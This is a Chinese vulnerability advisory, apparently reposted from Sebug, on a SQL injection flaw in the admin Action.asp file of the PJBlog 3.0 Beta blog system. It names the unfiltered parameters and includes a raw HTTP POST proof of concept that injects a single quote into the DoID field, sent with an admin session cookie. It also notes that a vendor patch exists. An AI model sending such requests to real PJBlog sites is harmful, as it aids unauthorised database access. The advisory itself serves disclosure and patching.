PJBlog博客系统后台Action.aspSQL注入缺陷

影响版本:

3.0 Beta漏洞描述:

PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,PJBlog同时支持简繁中文,UTF-8编码,相对于其他系统,PJBlog具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。
在文件control/ Action.aspp中。

变量moduleID,GetPlugName,KeyWordID,smilesID,LinkID,mem_ID,doCommID,selCommID,TagsID,DelCate没有过滤放入sql语句导致注入漏洞的产生。

<*参考  无 *>

测试方法:

[www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!POST /ConContent.asp HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword,

application/vnd.ms-excel, application/vnd.ms-powerpoint, */*

Referer: http://127.0.0.1:103/ConContent.asp?Fmenu=Categories

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)

Host: 127.0.0.1:103

Content-Length: 101

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: PJBlog3Setting=ViewType=normal;

PJBlog3=memRight=111111111111&memName=admin&memHashKey=01c1dc172188d12f917e6c2492e787d43ce0966c;

ASPSESSIONIDQAABRAAQ=LAJBLBADFALCDBPMDPHHNCGL; ASP.NET_SessionId=052531uhossk1155ks5dm245;CheckCode=4633B8B4FA46833C; ASPSESSIONIDCABCSCDT=ICDNLLBDEBHJHCMNKBICIECH;ASPSESSIONIDQABBRABQ=IPGLOPCDNGMADODNDNMDLALO

action=Skins&whatdo=delModule&DoID=1%27&Submit=%E4%BF%9D%E5%AD%98%E6%97%A5%E5%BF%97%E5%88%86%E7%B1%BB

SEBUG安全建议:

PJblog

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://bbs.pjhome.net/thread-48122-1-1.html

【编辑推荐】

  1. 重新审视企业IPS的应用:防御SQL注入攻击的利剑
  2. SQL注入攻击及其防范检测技术研究
  3. 安全技巧:学会检查SQL注入式攻击漏洞

本文名称:PJBlog博客系统后台Action.aspSQL注入缺陷
转载注明:http://www.shufengxianlan.com/qtweb/news40/456840.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联